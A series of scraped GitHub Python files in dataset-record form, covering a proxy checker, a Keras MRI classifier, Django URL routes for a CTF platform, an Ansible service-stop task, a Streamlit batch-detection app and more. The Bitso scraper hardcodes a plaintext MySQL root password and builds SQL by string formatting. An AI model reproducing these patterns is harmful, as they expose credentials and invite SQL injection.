Les équipements sont au cœur de toute GMAO. Sans équipements, vous n\\'avez rien sur quoi exécuter la maintenance ! Vous pouvez créer des actifs individuellement ou les importer à partir d\\'un fichier de feuille de calcul.

\"))\n self.ButtonCreerEquipement.setText(_translate(\"Dialog\", \"Ajouter un Equipement\"))\n self.label.setText(_translate(\"Dialog\", \"Actions :\"))\n self.ButtonModifier.setText(_translate(\"Dialog\", \"Modifier\"))\n self.ButtonSupprimer.setText(_translate(\"Dialog\", \"Supprimer\"))\n","repo_name":"ahmedhamila/GMAO","sub_path":"Source/Views/EquipementViews/EquipementList.py","file_name":"EquipementList.py","file_ext":"py","file_size_in_byte":11101,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10615136810","text":"import requests\nimport json \nimport logging\nimport argparse\n\nURL = 'http://httpbin.org/ip'\n\nclass ProxyChecker:\n \n def __init__(self, proxt_list_path: str=None) -> None:\n self.proxy_list_path = proxt_list_path\n \n def save_proxy(self, proxy):\n with open('working_proxies.txt', 'a') as fp:\n fp.write(f'{proxy}\\n')\n \n def _check_proxy(self, proxy, ip):\n return True if proxy == ip else False\n \n def check_proxy(self):\n \n if self.proxy_list_path == None:\n print(\"Proxy list cannot be None. Please specify the path of proxy list\")\n return \n \n try:\n with open(self.proxy_list_path, 'r') as fp:\n proxies = fp.read().split()\n \n except FileNotFoundError:\n print(\"Cannot find the proxy list. Please specify the correct path\")\n return \n\n # get through all proxies\n for proxy in proxies:\n \n _proxies = {\n 'http': f'http://{proxy}',\n 'https': f'https://{proxy}'\n }\n \n # send the request\n response = requests.get(URL, _proxies)\n # get the response\n data = json.loads(response.text)\n ip = data['origin']\n print(f'{ip} response for {proxy} proxy')\n # check if the response matches the specified proxy\n if self._check_proxy(ip, proxy.split(':')[0]):\n # - save the proxy\n print(f\"Working proxy found! - {proxy}\")\n self.save_proxy(proxy)\n\n # save logs\n logging.basicConfig(\n filename='logs.txt', \n filemode='a', \n format='%(asctime)s,%(msecs)d %(name)s %(levelname)s %(message)s',\n datefmt='%H:%M%S',\n level=logging.DEBUG)\n \nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser(\n prog='proxy_checker.py',\n description='Checks working proxies'\n )\n \n parser.add_argument('path', help='Path to proxy list')\n args = parser.parse_args()\n proxy_checker = ProxyChecker(args.path)\n proxy_checker.check_proxy()\n","repo_name":"SarfarazMir/ProxyChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25685404421","text":"import sublime, sublime_plugin, os \n\nclass ModuleAutoCompleteCommand(sublime_plugin.EventListener):\n\tSCOPE_NAME = 'text.html.pp.module';\n\tMODULES_ROOT = '\\Content\\Modules';\n\n\tdef on_query_completions(self, view, prefix, locations):\n\t\tif self.SCOPE_NAME in view.scope_name(locations[0]):\n\t\t\tautocomplete_list = self.getDirs();\n\t\t\treturn autocomplete_list;\n\n\tdef getDirs(self):\n\t\tmodulesList = [];\n\t\tfolders = sublime.active_window().folders();\n\t\t# print (folders[0].lower().endswith('sites'))\n\t\tif folders[0].lower().endswith('sites'):\n\t\t\tfolders = get_immediate_subdirectories(self,folders[0])\n\t\tfor x in folders:\n\t\t\tif x.endswith('dev'):\n\t\t\t\tcontinue;\n\t\t\tfullPath = x+self.MODULES_ROOT;\n\t\t\tfor dir in os.listdir(fullPath):\n\t\t\t\tif '.' not in dir:\n\t\t\t\t\tfor fileName in os.listdir(fullPath+'\\\\'+dir):\n\t\t\t\t\t\tmPath = dir+'/'+os.path.splitext(fileName)[0];\n\t\t\t\t\t\tif '.' not in mPath:\n\t\t\t\t\t\t\tmodulesList.append([mPath,mPath]);\n\t\treturn modulesList;\ndef get_immediate_subdirectories(self, a_dir):\n return [a_dir+'\\\\'+name for name in os.listdir(a_dir)\n if os.path.isdir(os.path.join(a_dir, name))]\n\t\n\t\t","repo_name":"yoavdooble/sublime-dooble","sub_path":"ModuleAutoComplete.py","file_name":"ModuleAutoComplete.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"14484031995","text":"import nibabel as nib\n\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Flatten, Conv3D, MaxPooling3D, Dropout, BatchNormalization\nfrom tensorflow.keras.utils import to_categorical\nimport numpy as np\n\ntrainx = [(nib.load('./Training/health/sub'+str(i)+'/T1_bet_2_0413.nii.gz').get_fdata()) for i in range(1,11)]\ntrainx2 = [nib.load('./Training/patient/sub'+str(i)+'/T1_bet_2_0413.nii.gz').get_fdata() for i in range(1,11)]\ntrainx.extend(trainx2)\ntrainx = np.array(trainx)\ntrainy = [0 for i in range(0,10)]\ntrainy.extend([1 for i in range(0,10)])\ntestx = [nib.load('./Testing/health/sub'+str(i)+'/T1_bet_2_0413.nii.gz').get_fdata() for i in range(1,6)]\ntestx2 = [nib.load('./Testing/patient/sub'+str(i)+'/T1_bet_2_0413.nii.gz').get_fdata() for i in range(1,6)]\ntestx.extend(testx2)\ntestx = np.array(testx)\ntesty = [0 for i in range(0,5)]\ntesty.extend([1 for i in range(0,5)])\ntrainx = np.expand_dims(trainx, axis = 4)\ntestx = np.expand_dims(testx, axis = 4)\n\n# model\n# Create the model\nmodel = Sequential()\nmodel.add(Conv3D(32, kernel_size=(3, 3, 3), activation='relu', kernel_initializer='he_uniform', input_shape=trainx[0].shape))\nmodel.add(MaxPooling3D(pool_size=(2, 2, 2)))\nmodel.add(BatchNormalization(center=True, scale=True))\nmodel.add(Dropout(0.5))\nmodel.add(Conv3D(64, kernel_size=(3, 3, 3), activation='relu', kernel_initializer='he_uniform'))\nmodel.add(MaxPooling3D(pool_size=(2, 2, 2)))\nmodel.add(BatchNormalization(center=True, scale=True))\nmodel.add(Dropout(0.5))\nmodel.add(Flatten())\nmodel.add(Dense(256, activation='relu', kernel_initializer='he_uniform'))\nmodel.add(Dense(256, activation='relu', kernel_initializer='he_uniform'))\nmodel.add(Dense(2, activation='softmax'))\n\n# Compile the model\nmodel.compile(loss='categorical_crossentropy',\n optimizer=keras.optimizers.Adam(lr=0.001),\n metrics=['accuracy'])\nmodel.summary()\n# Fit data to model\nhistory = model.fit(trainx, to_categorical(trainy),\n batch_size=3,\n epochs=10,\n verbose=1,\n validation_split=0.3)","repo_name":"flynsequeira/fmri-research","sub_path":"6389_project1/maxmodel.py","file_name":"maxmodel.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73453556004","text":"import os\nfrom workflow.task import Task\nfrom workflow.utils.ansible import Ansible\nfrom workflow.utils import env as ENV\nfrom kratos.apps.service.models import Service\n\nclass ServiceStop(Task):\n def __init__(self, *args, **kwargs):\n self.deploy_apth = kwargs.get('deploy_path')\n self.app_version = ENV.GET('app_version', kwargs.get('app_version'))\n self.cmd = kwargs.get('cmd')\n self.logger = ENV.GET('logger')\n\n def info(self):\n self.logger.info('TaskName=ServiceStop')\n\n def exec(self):\n self.info()\n\n # 获取服务信息\n services = Service.objects.filter(app_id=ENV.GET('app_id'), app_version=self.app_version)\n\n # Ansible初始化\n ansible = Ansible(servers=[service.server.id for service in services], connection='smart', become=True, become_method='sudo')\n\n # 执行停服命令\n self.logger.info('执行停止命令...')\n ansible.run(\n module='shell',\n args=self.cmd\n )\n\n # 删除应用软连接\n self.logger.info('删除应用软连接...')\n ansible.run(\n module='file',\n args='path=%s state=absent' % self.deploy_apth\n )\n\n # 获取执行结果\n ansible.get_result()\n\n # 更新服务信息\n services.update(status=2)\n\n self.logger.info('服务关闭完成! 任务执行完毕!')\n","repo_name":"cipher-ops/backend-kts","sub_path":"workflow/tasks/ServiceStop.py","file_name":"ServiceStop.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11080891297","text":"import pandas as pd\nimport requests\nimport sqlalchemy as sql\nimport datetime\nimport time \n\n\ndef extract_bitso_api():\n\n response = requests.get('https://api.bitso.com/v3/trades/?book=btc_mxn')\n json_response = response.json()\n datos = json_response['payload']\n df = pd.DataFrame(datos)\n\n engine = sql.create_engine('mysql+mysqlconnector://root:Flow#45180@localhost/bitso_api')\n\n initial_q = ''' INSERT INTO bitso_trades\n (book, created_at, amount, maker_side, price, tid)\n VALUES \n '''\n\n values_q = \",\".join([\"\"\"('{}','{}','{}','{}','{}','{}')\"\"\".format(\n row.book,\n row.created_at,\n row.amount,\n row.maker_side,\n row.price,\n row.tid) for idx, row in df.iterrows()])\n\n end_q = \"\"\" ON DUPLICATE KEY UPDATE \n book = values(book),\n created_at = values(created_at),\n amount = values(amount),\n maker_side = values(maker_side),\n price = values(price),\n tid = values(tid);\"\"\"\n\n query = initial_q + values_q + end_q\n\n engine.execute(query)\n return None\n\nwhile True:\n extract_bitso_api()\n print(f\"Actualizando DB a las {datetime.datetime.today()}\")\n time.sleep(15)","repo_name":"rishells/trade","sub_path":"tradingAlgoritmico.py","file_name":"tradingAlgoritmico.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14234504732","text":"\"\"\"asteria URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n\nfrom announcements.views import AnnouncementListView\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\n\nimport challenges.views as challenge_views\nimport teams.views as team_views\n\nurlpatterns = [\n url('', include('django.contrib.auth.urls')),\n\n url(r'^$', AnnouncementListView .as_view(), name='announcements'),\n\n url(r'^admin/', admin.site.urls),\n\n url(r'^categories/$' , challenge_views.CategoryListView .as_view(), name='categories' ),\n url(r'^category/(?P[-\\w]+)/$' , challenge_views.CategoryDetailView .as_view(), name='category' ),\n url(r'^challenge/(?P[-\\w]+)/$', challenge_views.ChallengeDetailView.as_view(), name='challenge' ),\n url(r'^challenges/$' , challenge_views.ChallengeListView .as_view(), name='challenges' ),\n url(r'^level/(?P\\d{1,32})/$' , challenge_views.LevelDetailView .as_view(), name='level' ),\n url(r'^levels/$' , challenge_views.LevelListView .as_view(), name='levels' ),\n url(r'^reveal_hint/$' , challenge_views.reveal_hint , name='reveal_hint'),\n url(r'^submit_flag/$' , challenge_views.submit_flag , name='submit_flag'),\n\n url(r'^appoint_captain/$' , team_views.appoint_captain , name='appoint_captain' ),\n url(r'^change_team_name/$' , team_views.change_team_name , name='change_team_name' ),\n url(r'^change_team_password/$' , team_views.change_team_password , name='change_team_password'),\n url(r'^join_team/$' , team_views.join_team , name='join_team' ),\n url(r'^player/(?P[-\\w]+)$', team_views.PlayerView .as_view(), name='player' ),\n url(r'^promote_demote/$' , team_views.promote_demote , name='promote_demote' ),\n url(r'^register/$' , team_views.register , name='register' ),\n url(r'^scoreboard/$' , team_views.ScoreboardView .as_view(), name='scoreboard' ),\n url(r'^team/(?P[-\\w]+)$' , team_views.TeamView .as_view(), name='team' ),\n]\n\n","repo_name":"attackgithub/Asteria","sub_path":"asteria/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5584729029","text":"mySolution = []\nwith open('resultCatsAndAMouse.txt') as f:\n line = f.readline()\n while line:\n line = line.strip()\n mySolution.append(line)\n line = f.readline()\n#print(mySolution)\n\ngoodSolution = []\nwith open('goodSolutionCats.txt') as g:\n line = g.readline()\n while line:\n line = line.strip()\n goodSolution.append(line)\n line = g.readline()\n#print(goodSolution)\n\nfail = []\nfor i in range(0,100):\n if goodSolution[i] != mySolution[i]:\n fail.append(i)\n fail.append(goodSolution[i])\n fail.append(mySolution[i])\nprint(fail)\n\n\n","repo_name":"zseen/hackerrank-challenges","sub_path":"Python/Implementation/CatsAndAMouse/DebugCatsAndAMouse.py","file_name":"DebugCatsAndAMouse.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37285391798","text":"#\n# @lc app=leetcode id=423 lang=python3\n#\n# [423] Reconstruct Original Digits from English\n#\n# https://leetcode.com/problems/reconstruct-original-digits-from-english/description/\n#\n# algorithms\n# Medium (45.68%)\n# Likes: 122\n# Dislikes: 434\n# Total Accepted: 19.4K\n# Total Submissions: 42.5K\n# Testcase Example: '\"owoztneoer\"'\n#\n# Given a non-empty string containing an out-of-order English representation of\n# digits 0-9, output the digits in ascending order.\n# \n# Note:\n# \n# Input contains only lowercase English letters.\n# Input is guaranteed to be valid and can be transformed to its original\n# digits. That means invalid inputs such as \"abc\" or \"zerone\" are not\n# permitted.\n# Input length is less than 50,000.\n# \n# \n# \n# Example 1:\n# \n# Input: \"owoztneoer\"\n# \n# Output: \"012\"\n# \n# \n# \n# Example 2:\n# \n# Input: \"fviefuro\"\n# \n# Output: \"45\"\n# \n# \n#\nfrom collections import Counter\n\nclass Solution:\n def originalDigits(self, s: str) -> str:\n l, cnt, ret = [('zero','z'),('one','o'),('two','w'),('three','h'),('four','u'),('five','f'),('six','x'),('seven','s'),('eight','g'),('nine','i')], Counter(s), []\n for i in [0, 2, 4 , 6, 8, 1, 3, 5, 7, 9]:\n n = cnt[l[i][1]]\n for c in l[i][0]:\n cnt[c] -= n\n ret += [str(i)]*n\n\n return \"\".join(sorted(ret))\n\n \n\n","repo_name":"chenxu0602/LeetCode","sub_path":"423.reconstruct-original-digits-from-english.py","file_name":"423.reconstruct-original-digits-from-english.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"38874033168","text":"import re\nfrom html.entities import entitydefs\n\n\nclass StripHtmlTags(object):\n\n def process(self, html):\n \"\"\"\n Remove HTML tags from a string and replace numeric and\n named entities with the corresponding character, so the\n HTML text can be displayed in a simple text view.\n \"\"\"\n if html is None:\n return None\n\n # If we would want more speed, we could make these global\n re_strip_tags = re.compile('<[^>]*>')\n re_unicode_entities = re.compile('&#(\\d{2,4});')\n re_html_entities = re.compile('&(.{2,8});')\n re_newline_tags = re.compile('(]*>|<[/]?ul[^>]*>|)', re.I)\n re_listing_tags = re.compile(']*>', re.I)\n\n result = html\n\n # Convert common HTML elements to their text equivalent\n result = re_newline_tags.sub('\\n', result)\n result = re_listing_tags.sub('\\n * ', result)\n result = re.sub('<[Pp]>', '\\n\\n', result)\n\n # Remove all HTML/XML tags from the string\n result = re_strip_tags.sub('', result)\n # Convert numeric XML entities to their unicode character\n result = re_unicode_entities.sub(\n lambda x: chr(int(x.group(1))),\n result)\n\n # Convert named HTML entities to their unicode character\n result = re_html_entities.sub(\n lambda x: str(entitydefs.get(x.group(1), ''), 'iso-8859-1'),\n result)\n\n # Convert more than two newlines to two newlines\n result = re.sub('([\\r\\n]{2})([\\r\\n])+', '\\\\1', result)\n\n return result.strip()\n\n\nclass ConvertMarkdown(object):\n\n def process(self, html_str):\n import html2text\n\n try:\n text = html2text.html2text(html_str)\n return text.strip()\n\n except Exception:\n return ''\n","repo_name":"gpodder/mygpo-feedservice","sub_path":"feedservice/parse/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"35800786354","text":"import streamlit as st\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pm4py\r\nimport altair as alt\r\nimport os\r\nimport plotly.express as px\r\n\r\n#Removing a warning that will come due to deprication\r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n#Set the title for the sidebar\r\nst.sidebar.subheader('Features for batch detection')\r\n\r\n#Set the title for the app\r\nst.title(\"Batching\")\r\n\r\n#Import a file\r\ndef file_selector(folder_path='.'):\r\n filenames = os.listdir(folder_path)\r\n selected_filename = st.sidebar.selectbox('Select a file', filenames)\r\n return os.path.join(folder_path, selected_filename)\r\nfilename = file_selector()\r\nst.write('You selected `%s`' % filename)\r\n\r\n\r\n#Read in the data\r\n#data = pd.read_csv('event_log.csv', sep=\";\")\r\ndata = pd.read_csv(filename, sep=\";\")\r\n\r\n#Set some text to introduce the original event log\r\nst.subheader(\"This is the original event log\")\r\n\r\n#Show the original event log\r\nst.dataframe(data)\r\n\r\n#######\r\n# Time level batch detection - features selection\r\n#######\r\n\r\n# Select resources\r\nresource = data['resource'].unique()\r\nresource_selected = st.sidebar.multiselect('1. Select resources', resource)\r\nmask_resource = data['resource'].isin(resource_selected)\r\ndata = data[mask_resource]\r\n\r\n# Select activities\r\nactivity = data['activity'].unique()\r\nactivity_selected = st.sidebar.multiselect('2. Select activities', activity)\r\nmask_activity = data['activity'].isin(activity_selected)\r\ndata = data[mask_activity]\r\n\r\n#Drop the columns selected from the multiselect\r\n#Select multiple columns\r\ncols_drop = st.multiselect(\"Select columns to drop\", data.columns)\r\n#Drop columns\r\ndata = data.drop(cols_drop, axis=1)\r\n\r\n#Show the new dataframe\r\n#Text to introduce the new dataframe\r\nst.text(\"Once features have been selected, the event log looks like this\")\r\n#Show the new dataframe\r\nst.dataframe(data)\r\n\r\n#Change the time between activites that should form a batch\r\nm=st.sidebar.slider(\"3. Time in minutes between activites that should form a batch\",1,60)\r\n\r\n#######\r\n# Time level batch detection - features selection end\r\n#######\r\n\r\n#######\r\n# Time level batch detection\r\n#######\r\n\r\n# Sort events by time start and time end\r\ndata[\"start time\"] = pd.to_datetime(data[\"start time\"], format=\"%Y-%m-%d %H:%M:%S\")\r\ndata[\"end time\"] = pd.to_datetime(data[\"end time\"], format=\"%Y-%m-%d %H:%M:%S\")\r\ndata = data.sort_values(['start time','end time'])\r\n\r\nevents = data[[\"start time\", \"end time\"]].to_dict(\"r\")\r\nfor e in events:\r\n e[\"start time\"] = e[\"start time\"].timestamp()\r\n e[\"end time\"] = e[\"end time\"].timestamp()\r\nintervals = [(e[\"start time\"], e[\"end time\"], set([(e[\"start time\"], e[\"end time\"])])) for e in events]\r\nintervals.sort()\r\n\r\n\r\n# Merge overlaping intervals\r\ncontinue_cycle = True\r\nwhile continue_cycle:\r\n continue_cycle = False\r\n i = 0\r\n while i < len(intervals)-1:\r\n if intervals[i][1] > intervals[i+1][0]:\r\n # decide to merge interval i and i+1\r\n new_interval = (min(intervals[i][0], intervals[i+1][0]), max(intervals[i][1], intervals[i+1][1]), intervals[i][2].union(intervals[i+1][2]))\r\n # add the new interval to the list\r\n intervals.append(new_interval)\r\n # remove the i+1 interval\r\n del intervals[i+1]\r\n # remove the i interval\r\n del intervals[i]\r\n # sort the intervals\r\n intervals.sort()\r\n # set the variable continue_cycle to True\r\n continue_cycle = True\r\n # interrupt the current iteration on the intervals\r\n break\r\n i = i + 1\r\n\r\n# Here we merge intrval with time in minutes defind before\r\ncontinue_cycle = True\r\nwhile continue_cycle:\r\n continue_cycle = False\r\n i = 0\r\n while i < len(intervals)-1:\r\n if intervals[i+1][0] - intervals[i][1] <= m*60:\r\n # decide to merge interval i and i+1\r\n new_interval = (min(intervals[i][0], intervals[i+1][0]), max(intervals[i][1], intervals[i+1][1]), intervals[i][2].union(intervals[i+1][2]))\r\n # add the new interval to the list\r\n intervals.append(new_interval)\r\n # remove the i+1 interval\r\n del intervals[i+1]\r\n # remove the i interval\r\n del intervals[i]\r\n # sort the intervals\r\n intervals.sort()\r\n # set the variable continue_cycle to True\r\n continue_cycle = True\r\n # interrupt the current iteration on the intervals\r\n break\r\n i = i + 1\r\n\r\n# Here is batching\r\nfrom pandas import DataFrame\r\nbatch = [len(interval[2]) for interval in intervals]\r\ndf_batches = DataFrame (batch,columns=['Number of events'])\r\n\r\n# Types of batching\r\n\r\ndef check_batch_type(batch):\r\n events_batch = sorted(list(batch[2]))\r\n # take the minimum of the left-extreme of each interval\r\n min_left_events = min(ev[0] for ev in events_batch)\r\n # take the maximum of the left-extreme of each interval\r\n max_left_events = max(ev[0] for ev in events_batch)\r\n # take the minimum of the right-extreme of each interval\r\n min_right_events = min(ev[1] for ev in events_batch)\r\n # take the maximum of the right-extreme of each interval\r\n max_right_events = max(ev[1] for ev in events_batch)\r\n \r\n # CONDITION 1 - All the events in the batch have identical start and end timestamps\r\n if min_left_events == max_left_events and min_right_events == max_right_events:\r\n return \"Simultaneous\"\r\n # CONDITION 4 - All the events in the batch have identical start timestamp:\r\n if min_left_events == max_left_events:\r\n return \"Batching on Start\"\r\n # CONDITION 5 - All the events in the batch have identical end timestamp:\r\n if min_right_events == max_right_events:\r\n return \"Batching on End\"\r\n \r\n # now we could be in the SEQUENTIAL batching or the CONCURRENT batching\r\n # in order to be in the SEQUENTIAL, we need that for all the consecutive events the end of the first is equal to the start of the second\r\n is_sequential = True\r\n i = 0\r\n while i < len(events_batch)-1:\r\n # if there are two consecutive events that are not sequentially matched, then we automatically fall inside the CONCURRENT batching\r\n if events_batch[i][1] != events_batch[i+1][0]:\r\n is_sequential = False\r\n break\r\n i = i + 1\r\n if is_sequential:\r\n return \"Sequential batching\"\r\n else:\r\n return \"Concurrent batching\"\r\n\r\n# \r\ndf_types= pd.DataFrame(columns=['batch_type', 'len'])\r\n\r\n# check the type for each batch (interval of length at least equal to two)\r\nfor interv in intervals:\r\n if len(interv[2]) >= 2:\r\n batch_type = check_batch_type(interv)\r\n #print(batch_type)\r\n df_types = df_types.append({'batch_type': batch_type, 'len': len(interv[2])}, ignore_index=True)\r\n\r\n\r\n\r\n\r\n# STATISTICS\r\n\r\n# total number of batches with two and more events\r\ndf_batches_new = df_batches[df_batches['Number of events']!=1]\r\n\r\n\r\n\r\ndf_end = df_types.loc[df_types['batch_type'] == 'Batching on End']\r\ndf_seq = df_types.loc[df_types['batch_type'] == 'Sequential batching']\r\ndf_con = df_types.loc[df_types['batch_type'] == 'Concurrent batching']\r\ndf_start = df_types.loc[df_types['batch_type'] == 'Batching on Start']\r\ndf_sim = df_types.loc[df_types['batch_type'] == 'Simultaneous batching']\r\n\r\n\r\nst.subheader('Total number of batches')\r\ncount_column = df_types['batch_type'].count()\r\ncount_column\r\n\r\nst.text('Batching types')\r\n\r\n# total number of batches per each batching type and in total\r\nsum_end_batch = df_end['batch_type'].count()\r\nsum_start_batch = df_start['batch_type'].count()\r\nsum_seq_batch = df_seq['batch_type'].count()\r\nsum_sim_batch = df_sim['batch_type'].count()\r\nsum_con_batch = df_con['batch_type'].count()\r\n\r\n# Table\r\nbatching_types = {'concurrent': [sum_con_batch], 'sequential': [sum_seq_batch], 'simultaneous': [sum_sim_batch], 'on start': [sum_start_batch], 'on end': [sum_end_batch]}\r\ndf_batching_event = pd.DataFrame(data=batching_types)\r\ndf_batching_event\r\n\r\n\r\n# total number of batched events per each batching type and in total\r\nsum_end = df_end['len'].sum()\r\nsum_start = df_start['len'].sum()\r\nsum_seq = df_seq['len'].sum()\r\nsum_con = df_con['len'].sum()\r\nsum_sim = df_sim['len'].sum()\r\nsum_all_batches = sum_end + sum_start + sum_seq + sum_con + sum_sim\r\n\r\nst.subheader('Total number of batched events, all types')\r\nsum_all_batches\r\n\r\nst.text('Batched events per types')\r\n# Table\r\nbatching_events_types = {'concurrent': [sum_con], 'sequential': [sum_seq], 'simultaneous': [sum_sim], 'on start': [sum_start], 'on end': [sum_end]}\r\ndf_batching_event_types = pd.DataFrame(data=batching_events_types)\r\ndf_batching_event_types\r\n\r\n# total number of batched events, all batching types\r\n#st.text('Total number of batched events, all batching types')\r\n#sum_all_event = df_types['len'].sum()\r\n#sum_all_event\r\n\r\nst.text('Batches and batched events')\r\ndf_batches_new\r\n\r\n\r\n# Statistics\r\n\r\n\r\n#######\r\n# Time level batch detection end\r\n#######\r\n\r\n\r\n#######\r\n# Case level batch detection\r\n#######\r\n\r\ndef load_dataframe():\r\n df = pm4py.read_csv(\"event_log.csv\", sep=\";\")\r\n df = pm4py.objects.log.util.dataframe_utils.convert_timestamp_columns_in_df(df)\r\n df = df.sort_values(['start time', 'end time'])\r\n df[\"event id\"] = df.index.astype(str)\r\n df = df.reset_index()\r\n return df\r\n\r\n\r\ndef get_groups_from_dataframe(df):\r\n return df.groupby([\"activity\", \"resource\"]).size().to_dict()\r\n\r\n\r\ndef merge_overlapping_intervals(intervals):\r\n continue_cycle = True\r\n while continue_cycle:\r\n continue_cycle = False\r\n i = 0\r\n while i < len(intervals) - 1:\r\n if intervals[i][1] > intervals[i + 1][0]:\r\n # decide to merge interval i and i+1\r\n new_interval = (min(intervals[i][0], intervals[i + 1][0]), max(intervals[i][1], intervals[i + 1][1]),\r\n intervals[i][2].union(intervals[i + 1][2]))\r\n # add the new interval to the list\r\n intervals.append(new_interval)\r\n # remove the i+1 interval\r\n del intervals[i + 1]\r\n # remove the i interval\r\n del intervals[i]\r\n # sort the intervals\r\n intervals.sort()\r\n # set the variable continue_cycle to True\r\n continue_cycle = True\r\n # interrupt the current iteration on the intervals\r\n break\r\n i = i + 1\r\n return intervals\r\n\r\n\r\ndef merge_near_intervals(intervals, max_allowed_distance):\r\n continue_cycle = True\r\n while continue_cycle:\r\n continue_cycle = False\r\n i = 0\r\n while i < len(intervals) - 1:\r\n if intervals[i + 1][0] - intervals[i][1] <= max_allowed_distance:\r\n # decide to merge interval i and i+1\r\n new_interval = (min(intervals[i][0], intervals[i + 1][0]), max(intervals[i][1], intervals[i + 1][1]),\r\n intervals[i][2].union(intervals[i + 1][2]))\r\n # add the new interval to the list\r\n intervals.append(new_interval)\r\n # remove the i+1 interval\r\n del intervals[i + 1]\r\n # remove the i interval\r\n del intervals[i]\r\n # sort the intervals\r\n intervals.sort()\r\n # set the variable continue_cycle to True\r\n continue_cycle = True\r\n # interrupt the current iteration on the intervals\r\n break\r\n i = i + 1\r\n return intervals\r\n\r\n\r\ndef check_batch_type(batch):\r\n events_batch = sorted(list(batch[2]))\r\n # take the minimum of the left-extreme of each interval\r\n min_left_events = min(ev[0] for ev in events_batch)\r\n # take the maximum of the left-extreme of each interval\r\n max_left_events = max(ev[0] for ev in events_batch)\r\n # take the minimum of the right-extreme of each interval\r\n min_right_events = min(ev[1] for ev in events_batch)\r\n # take the maximum of the right-extreme of each interval\r\n max_right_events = max(ev[1] for ev in events_batch)\r\n\r\n # CONDITION 1 - All the events in the batch have identical start and end timestamps\r\n if min_left_events == max_left_events and min_right_events == max_right_events:\r\n return \"Simultaneous\"\r\n # CONDITION 4 - All the events in the batch have identical start timestamp:\r\n if min_left_events == max_left_events:\r\n return \"Batching on Start\"\r\n # CONDITION 5 - All the events in the batch have identical end timestamp:\r\n if min_right_events == max_right_events:\r\n return \"Batching on End\"\r\n\r\n # now we could be in the SEQUENTIAL batching or the CONCURRENT batching\r\n # in order to be in the SEQUENTIAL, we need that for all the consecutive events the end of the first is equal to the start of the second\r\n is_sequential = True\r\n i = 0\r\n while i < len(events_batch) - 1:\r\n # if there are two consecutive events that are not sequentially matched, then we automatically fall inside the CONCURRENT batching\r\n if events_batch[i][1] != events_batch[i + 1][0]:\r\n is_sequential = False\r\n break\r\n i = i + 1\r\n if is_sequential:\r\n return \"Sequential batching\"\r\n else:\r\n return \"Concurrent batching\"\r\n\r\n\r\n\r\ndef get_events_from_dataframe(dataframe):\r\n all_events = [(x[\"start time\"].timestamp(), x[\"end time\"].timestamp(), x[\"case\"]) for x in\r\n dataframe[[\"start time\", \"end time\", \"case\"]].to_dict(\"r\")]\r\n all_events.sort()\r\n return all_events\r\n\r\n\r\n\r\ndef find_batches_with_type_and_count_cases(df, case_dict):\r\n events = get_events_from_dataframe(df)\r\n intervals = [(e[0], e[1], {(e[0], e[1], e[2])}) for e in\r\n events]\r\n intervals.sort()\r\n intervals = merge_overlapping_intervals(intervals)\r\n intervals = merge_near_intervals(intervals, 15 * 60)\r\n batches = [x for x in intervals if len(x[2]) > 1]\r\n for batch in batches:\r\n batch_type = check_batch_type(batch)\r\n cases = set(x[2] for x in batch[2])\r\n for case in cases:\r\n case_dict[batch_type][case] = case_dict[batch_type][case] + 1\r\n\r\n\r\ndef measure_service_time(list_events):\r\n # we start measuring the service time\r\n service_time_total = 0.0\r\n\r\n # take the first event (the one in list_events[0]) and consider its start time (list_events[0][0]) and its end time (list_events[0][1])\r\n this_start = list_events[0][0]\r\n this_end = list_events[0][1]\r\n\r\n i = 1\r\n while i < len(list_events):\r\n # for the i-th event, consider its start time (list_events[i][0]) and end time (list_events[i][1])\r\n curr_start = list_events[i][0]\r\n curr_end = list_events[i][1]\r\n\r\n # if the current event start is greater than the previously recorded end, its time to add the difference between this_end and this_start to the service time\r\n if curr_start > this_end:\r\n service_time_total = service_time_total + this_end - this_start\r\n this_start = curr_start\r\n this_end = curr_end\r\n else:\r\n # otherwise, the events are overlapping, so update the completion time by the new end timestamp (take the maximum between the old recorded one and the new)\r\n this_end = max(this_end, curr_end)\r\n i = i + 1\r\n\r\n # at the end of the iteration, add the current values of this_start and this_end that still are not recorded in the service time\r\n service_time_total = service_time_total + this_end - 